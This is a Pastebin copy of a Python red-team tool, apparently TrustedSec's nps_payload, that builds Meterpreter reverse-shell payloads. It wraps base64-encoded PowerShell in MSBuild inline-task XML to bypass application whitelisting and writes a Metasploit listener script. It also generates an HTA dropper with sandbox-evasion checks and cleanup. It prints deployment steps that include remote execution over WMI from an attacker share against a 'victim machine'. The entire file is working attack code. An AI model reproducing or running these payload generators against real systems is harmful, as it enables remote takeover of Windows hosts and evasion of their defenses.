SHARE
TWEET

Untitled

a guest Feb 14th, 2020 61 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2.  
  3. # Written by Larry Spohn (@Spoonman1091)
  4. # Payload written by Ben Mauch (@Ben0xA) aka dirty_ben
  5. # TrustedSec, LLC
  6. # https://www.trustedsec.com
  7.  
  8. from __future__ import print_function
  9. import os
  10. import sys
  11. import netifaces as nic
  12. import pexpect
  13. import base64
  14.  
  15. class bcolors:
  16.   BLUE = '\033[94m'
  17.   GREEN = '\033[92m'
  18.   WARNING = '\033[93m'
  19.   WHITE = '\033[97m'
  20.   ERROR = '\033[91m'
  21.   ENDC = '\033[0m'
  22.   BOLD = '\033[1m'
  23.   UNDERLINE = '\033[4m'
  24.  
  25. listener_ip = "127.0.0.1"
  26.  
  27. # Configure for auto detection of local IP Address
  28. local_interface = "ens33"
  29.  
  30. try:
  31.     raw_input          # Python 2
  32. except NameError:
  33.     raw_input = input  # Python 3
  34.  
  35. # Enumerate the local IP assigned to "iface"
  36. def get_local_ip(iface):
  37.   try:
  38.     nic.ifaddresses(iface)
  39.     local_ip = nic.ifaddresses(iface)[2][0]['addr']
  40.     return local_ip
  41.   except:
  42.     pass
  43.  
  44. def generate_msfvenom_payload(msf_payload):
  45.   global listener_ip
  46.  
  47.   if (listener_ip == "127.0.0.1"):
  48.     local_ip = get_local_ip(local_interface)
  49.     listener_ip = raw_input("Enter Your Local IP Address (%s): " % local_ip) or local_ip
  50.  
  51.   # Get listern port from user
  52.   msf_port = raw_input("Enter the listener port (443): ") or 443
  53.  
  54.   # Generate PSH payload
  55.   print(bcolors.BLUE + "[*]" + bcolors.ENDC + " Generating PSH Payload...")
  56.   output = pexpect.run("msfvenom -p %s LHOST=%s LPORT=%s --arch x86 --platform win -f psh -o msf_payload.ps1" % (msf_payload,listener_ip,msf_port))
  57.  
  58.   # Generate resource script
  59.   print(bcolors.BLUE + "[*]" + bcolors.ENDC + " Generating MSF Resource Script...")
  60.   msf_resource_file = open("msbuild_nps.rc", "a")
  61.   payload_listener = "\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j -z" % (msf_payload, listener_ip, msf_port)
  62.   msf_resource_file.write(payload_listener)
  63.   msf_resource_file.close()
  64.  
  65. def encode_pshpayload(payload_file):
  66.   global psh_payload
  67.  
  68.   psh_file = open(payload_file, "r")
  69.   psh_payload = psh_file.read() + "for (;;){\n  Start-sleep 60\n}"
  70.   psh_payload = base64.b64encode(psh_payload.encode('utf-8'))
  71.   psh_file.close()
  72.   return psh_payload
  73.  
  74. def generate_msbuild_nps_msf_payload():
  75.   global psh_payload
  76.   global listener_ip
  77.  
  78.   # Delete old resource script
  79.   if os.path.exists("msbuild_nps.rc"):
  80.     os.remove("msbuild_nps.rc")
  81.  
  82.   # Initilize new resource script
  83.   msf_resource_file = open("msbuild_nps.rc", "a")
  84.   msf_resource_file.write("use multi/handler")
  85.   msf_resource_file.close()
  86.  
  87.   # Display options to the user
  88.   print("\nPayload Selection:")
  89.   print("\n\t(1)\twindows/meterpreter/reverse_tcp")
  90.   print("\t(2)\twindows/meterpreter/reverse_http")
  91.   print("\t(3)\twindows/meterpreter/reverse_https")
  92.   print("\t(4)\tCustom PS1 Payload")
  93.  
  94.   options = {1: "windows/meterpreter/reverse_tcp",
  95.              2: "windows/meterpreter/reverse_http",
  96.              3: "windows/meterpreter/reverse_https",
  97.              4: "custom_ps1_payload"
  98.   }
  99.  
  100.   # Generate payload
  101.   try:
  102.     msf_payload = input("\nSelect payload: ")
  103.     if (options.get(msf_payload) == "custom_ps1_payload"):
  104.       custom_ps1 = raw_input("Enter the location of your custom PS1 file: ")
  105.       encode_pshpayload(custom_ps1)
  106.     else:
  107.       generate_msfvenom_payload(options.get(msf_payload))
  108.       encode_pshpayload("msf_payload.ps1")
  109.  
  110.   except KeyError:
  111.     pass
  112.  
  113.  
  114.   # Create msbuild_nps.xml
  115.   msbuild_nps_file = open("msbuild_nps.xml", "w")
  116.   msbuild_nps_file.write("""<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  117.   <!-- This inline task executes c# code. -->
  118.   <!-- C:\Windows\Microsoft.NET\Framework64\\v4.0.30319\msbuild.exe nps.xml -->
  119.   <!-- Original MSBuild Author: Casey Smith, Twitter: @subTee -->
  120.   <!-- NPS Created By: Ben Ten, Twitter: @ben0xa -->
  121.   <!-- License: BSD 3-Clause -->
  122.   <Target Name="npscsharp">
  123.    <nps />
  124.   </Target>
  125.   <UsingTask
  126.     TaskName="nps"
  127.     TaskFactory="CodeTaskFactory"
  128.     AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
  129.   <Task>
  130.     <Reference Include="System.Management.Automation" />
  131.       <Code Type="Class" Language="cs">
  132.         <![CDATA[
  133.           using System;
  134.       using System.Collections.ObjectModel;
  135.       using System.Management.Automation;
  136.       using System.Management.Automation.Runspaces;
  137.       using Microsoft.Build.Framework;
  138.       using Microsoft.Build.Utilities;
  139.       public class nps : Task, ITask
  140.         {
  141.             public override bool Execute()
  142.             {
  143.               string cmd = "%s";
  144.                 PowerShell ps = PowerShell.Create();
  145.                 ps.AddScript(Base64Decode(cmd));
  146.                 Collection<PSObject> output = null;
  147.                 try
  148.                 {
  149.                     output = ps.Invoke();
  150.                 }
  151.                 catch(Exception e)
  152.                 {
  153.                     Console.WriteLine("Error while executing the script.\\r\\n" + e.Message.ToString());
  154.                 }
  155.                 if (output != null)
  156.                 {
  157.                     foreach (PSObject rtnItem in output)
  158.                     {
  159.                         Console.WriteLine(rtnItem.ToString());
  160.                     }
  161.                 }
  162.                 return true;
  163.             }
  164.             public static string Base64Encode(string text) {
  165.            return System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(text));
  166.         }
  167.         public static string Base64Decode(string encodedtext) {
  168.             return System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(encodedtext));
  169.         }
  170.         }
  171.         ]]>
  172.       </Code>
  173.     </Task>
  174.   </UsingTask>
  175. </Project>""" % psh_payload)
  176.  
  177.   print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Metasploit resource script written to msbuild_nps.rc")  
  178.   print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Payload written to msbuild_nps.xml")
  179.   print("\n1. Run \"" + bcolors.WHITE + "msfconsole -r msbuild_nps.rc" + bcolors.ENDC + "\" to start listener.")
  180.   print("2. Choose a Deployment Option (a or b): - See README.md for more information.")
  181.   print("  a. Local File Deployment:\n" + bcolors.WHITE + "    - %windir%\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe <folder_path_here>\\msbuild_nps.xml" + bcolors.ENDC)
  182.   print("  b. Remote File Deployment:\n" + bcolors.WHITE + "    - wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe \\\\<attackerip>\\<share>\\msbuild_nps.xml" + bcolors.ENDC)
  183.   print("3. Hack the Planet!!")
  184.  
  185.   sys.exit(0)
  186.  
  187. def generate_msbuild_nps_msf_hta_payload():
  188.   global psh_payload
  189.   global listener_ip
  190.  
  191.   psh_payload = ""
  192.   psh_payloads = ""
  193.   payload_count = 1
  194.  
  195.  
  196.   # Delete old resource script
  197.   if os.path.exists("msbuild_nps.rc"):
  198.     os.remove("msbuild_nps.rc")
  199.  
  200.   # Initilize new resource script
  201.   msf_resource_file = open("msbuild_nps.rc", "a")
  202.   msf_resource_file.write("use multi/handler")
  203.   msf_resource_file.close()
  204.  
  205.   while True:
  206.     # Display options to the user
  207.     print("\nPayload Selection:")
  208.     print("\n\t(1)\twindows/meterpreter/reverse_tcp")
  209.     print("\t(2)\twindows/meterpreter/reverse_http")
  210.     print("\t(3)\twindows/meterpreter/reverse_https")
  211.     print("\t(4)\tCustom PS1 Payload")
  212.     print("\t(99)\tFinished")
  213.  
  214.     options = {1: "windows/meterpreter/reverse_tcp",
  215.                2: "windows/meterpreter/reverse_http",
  216.                3: "windows/meterpreter/reverse_https",
  217.                4: "custom_ps1_payload",
  218.                99: "finished"
  219.     }
  220.  
  221.     # Generate payloads
  222.     try:
  223.       msf_payload = input("\nSelect multiple payloads. Enter 99 when finished: ")
  224.       if (options.get(msf_payload) == "finished"):
  225.         break
  226.       elif (options.get(msf_payload) == "custom_ps1_payload"):
  227.         custom_ps1 = raw_input("Enter the location of your custom PS1 file: ")
  228.         encode_pshpayload(custom_ps1)
  229.       else:
  230.         generate_msfvenom_payload(options.get(msf_payload))
  231.         encode_pshpayload("msf_payload.ps1")
  232.         os.remove("msf_payload.ps1")
  233.  
  234.       # Generate payload vbs array string
  235.       if (payload_count == 1):
  236.         psh_payloads = "\"" + psh_payload + "\""
  237.       else:
  238.         psh_payloads += ", _\n\t\"" + psh_payload + "\""
  239.       payload_count += 1
  240.  
  241.     except KeyError:
  242.       pass
  243.  
  244.   # Create msbuild_nps.xml
  245.   msbuild_nps_file = open("msbuild_nps.hta", "w")
  246.   msbuild_nps_file.write("""<script language=vbscript>
  247.   On Error Resume Next
  248.   Set objFSO = CreateObject("Scripting.FileSystemObject")
  249.   Set objShell = CreateObject("WScript.Shell")
  250.   objTemp = objShell.ExpandEnvironmentStrings("%%TEMP%%")
  251.   objWindir = objShell.ExpandEnvironmentStrings("%%windir%%")
  252.   Set objWMIService = GetObject("winmgmts:\\\\.\\root\CIMV2")
  253.   arrUnicorns = Array(%s)
  254.   ' Get logical processor count
  255.   Set colComputerSystem = objWMIService.ExecQuery("SELECT * FROM Win32_ComputerSystem")
  256.   For Each objComputerSystem In colComputerSystem
  257.     objProcessorCount = objComputerSystem.NumberofLogicalProcessors
  258.   Next
  259.   ' Only run if system has more than 1 processor
  260.   ' https://www.trustedsec.com/may-2015/bypassing-virtualization-and-sandbox-technologies/
  261.   If objProcessorCount > 1 Then
  262.     ' Sleep 60 seconds
  263.     ' https://www.sans.org/reading-room/whitepapers/malicious/sleeping-sandbox-35797
  264.     objShell.Run "%%COMSPEC%% /c ping -n 60 127.0.0.1>nul", 0, 1
  265.     For Each objUnicorn in arrUnicorns
  266.       x = x + 1
  267.       ' Create MSBuild XML File
  268.       CreateMSBuildXML objUnicorn, x
  269.       ' Execute resource(x).xml using msbuild.exe and nps
  270.       objShell.Run objWindir & "\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe %%TEMP%%\\resource" & x & ".xml", 0
  271.     Next
  272.     ' Cleanup
  273.     For y = 1 To x
  274.       Do While objFSO.FileExists(objTemp & "\\resource" & y & ".xml")
  275.         objShell.Run "%%COMSPEC%% /c ping -n 10 127.0.0.1>nul", 0, 1
  276.         objFSO.DeleteFile(objTemp & "\\resource" & y & ".xml")
  277.       Loop
  278.     Next
  279.   End If
  280.   window.close()
  281.   ' Creates XML configuration files in the %%TEMP%% directory
  282.   Function CreateMSBuildXML(objUnicorn, x)
  283.     msbuildXML = "<Project ToolsVersion=" & CHR(34) & "4.0" & CHR(34) & " xmlns=" & CHR(34) & "http://schemas.microsoft.com/developer/msbuild/2003" & CHR(34) & ">" & vbCrLf &_
  284.     "  <!-- This inline task executes c# code. -->" & vbCrLf &_
  285.     "  <!-- C:\Windows\Microsoft.NET\Framework64\\v4.0.30319\msbuild.exe nps.xml -->" & vbCrLf &_
  286.     "  <!-- Original MSBuild Author: Casey Smith, Twitter: @subTee -->" & vbCrLf &_
  287.     "  <!-- NPS Created By: Ben Ten, Twitter: @ben0xa -->" & vbCrLf &_
  288.     "  <!-- License: BSD 3-Clause -->" & vbCrLf &_
  289.     "  <Target Name=" & CHR(34) & "npscsharp" & CHR(34) & ">" & vbCrLf &_
  290.     "   <nps />" & vbCrLf &_
  291.     "  </Target>" & vbCrLf &_
  292.     "  <UsingTask" & vbCrLf &_
  293.     "    TaskName=" & CHR(34) & "nps" & CHR(34) & "" & vbCrLf &_
  294.     "    TaskFactory=" & CHR(34) & "CodeTaskFactory" & CHR(34) & "" & vbCrLf &_
  295.     "    AssemblyFile=" & CHR(34) & "C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" & CHR(34) & " >" & vbCrLf &_
  296.     "  <Task>" & vbCrLf &_
  297.     "    <Reference Include=" & CHR(34) & "System.Management.Automation" & CHR(34) & " />" & vbCrLf &_
  298.     "      <Code Type=" & CHR(34) & "Class" & CHR(34) & " Language=" & CHR(34) & "cs" & CHR(34) & ">" & vbCrLf &_
  299.     "        <![CDATA[" & vbCrLf &_
  300.     "" & vbCrLf &_
  301.     "          using System;" & vbCrLf &_
  302.     "      using System.Collections.ObjectModel;" & vbCrLf &_
  303.     "      using System.Management.Automation;" & vbCrLf &_
  304.     "      using System.Management.Automation.Runspaces;" & vbCrLf &_
  305.     "      using Microsoft.Build.Framework;" & vbCrLf &_
  306.     "      using Microsoft.Build.Utilities;" & vbCrLf &_
  307.     "" & vbCrLf &_
  308.     "      public class nps : Task, ITask" & vbCrLf &_
  309.     "        {" & vbCrLf &_
  310.     "            public override bool Execute()" & vbCrLf &_
  311.     "            {" & vbCrLf &_
  312.     "              string cmd = " & CHR(34) & objUnicorn & CHR(34) & ";" & vbCrLf &_
  313.     "              " & vbCrLf &_
  314.     "                PowerShell ps = PowerShell.Create();" & vbCrLf &_
  315.     "                ps.AddScript(Base64Decode(cmd));" & vbCrLf &_
  316.     "" & vbCrLf &_
  317.     "                Collection<PSObject> output = null;" & vbCrLf &_
  318.     "                try" & vbCrLf &_
  319.     "                {" & vbCrLf &_
  320.     "                    output = ps.Invoke();" & vbCrLf &_
  321.     "                }" & vbCrLf &_
  322.     "                catch(Exception e)" & vbCrLf &_
  323.     "                {" & vbCrLf &_
  324.     "                    Console.WriteLine(" & CHR(34) & "Error while executing the script.\\r\\n" & CHR(34) & " + e.Message.ToString());" & vbCrLf &_
  325.     "                }" & vbCrLf &_
  326.     "                if (output != null)" & vbCrLf &_
  327.     "                {" & vbCrLf &_
  328.     "                    foreach (PSObject rtnItem in output)" & vbCrLf &_
  329.     "                    {" & vbCrLf &_
  330.     "                        Console.WriteLine(rtnItem.ToString());" & vbCrLf &_
  331.     "                    }" & vbCrLf &_
  332.     "                }" & vbCrLf &_
  333.     "                return true;" & vbCrLf &_
  334.     "            }" & vbCrLf &_
  335.     "" & vbCrLf &_
  336.     "            public static string Base64Encode(string text) {" & vbCrLf &_
  337.     "           return System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(text));" & vbCrLf &_
  338.     "        }" & vbCrLf &_
  339.     "" & vbCrLf &_
  340.     "        public static string Base64Decode(string encodedtext) {" & vbCrLf &_
  341.     "            return System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(encodedtext));" & vbCrLf &_
  342.     "        }" & vbCrLf &_
  343.     "        }" & vbCrLf &_
  344.     "        ]]>" & vbCrLf &_
  345.     "      </Code>" & vbCrLf &_
  346.     "    </Task>" & vbCrLf &_
  347.     "  </UsingTask>" & vbCrLf &_
  348.     "</Project>"
  349.     Set objFile = objFSO.CreateTextFile(objTemp & "\\resource" & x & ".xml", True)
  350.     objFile.WriteLine(msbuildXML)
  351.     objFile.Close
  352.   End Function
  353. </script>""" % psh_payloads)
  354.  
  355.   print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Metasploit resource script written to msbuild_nps.rc")  
  356.   print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Payload written to msbuild_nps.hta")
  357.   print("\n1. Run \"" + bcolors.WHITE + "msfconsole -r msbuild_nps.rc" + bcolors.ENDC + "\" to start listener.")
  358.   print("2. Deploy hta file to web server and navigate from the victim machine.")
  359.   print("3. Hack the Planet!!")
  360.  
  361.   sys.exit()
  362.  
  363. # Exit Program
  364. def quit():
  365.   sys.exit(0)
  366.  
  367.  
  368. # Main guts
  369. def main():
  370.   print("""
  371.                                      (            (
  372.                               ) (    )\        )  )\ )
  373.   (    `  )  (       `  )  ( /( )\ )((_)(   ( /( (()/(
  374.   )\ ) /(/(  )\      /(/(  )(_)|()/( _  )\  )(_)) ((_)
  375.  _(_/(((_)_\((_)    ((_)_\((_)_ )(_)) |((_)((_)_  _| |
  376. | ' \)) '_ \|_-<    | '_ \) _` | || | / _ \/ _` / _` |
  377. |_||_|| .__//__/____| .__/\__,_|\_, |_\___/\__,_\__,_|
  378.       |_|     |_____|_|         |__/
  379.                        v1.03
  380. """)
  381.  
  382.   while(1):
  383.     # Display options to the user
  384.     print("\n\t(1)\tGenerate msbuild/nps/msf payload")
  385.     print("\t(2)\tGenerate msbuild/nps/msf HTA payload")
  386.     print("\t(99)\tQuit")
  387.  
  388.     options = {1: generate_msbuild_nps_msf_payload,
  389.                2: generate_msbuild_nps_msf_hta_payload,
  390.                99: quit,
  391.     }
  392.     try:
  393.       task = input("\nSelect a task: ")
  394.       options[task]()
  395.     except KeyError:
  396.       pass
  397.  
  398.  
  399. # Standard boilerplate to call the main() function
  400. if __name__ == '__main__':
  401.   main()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top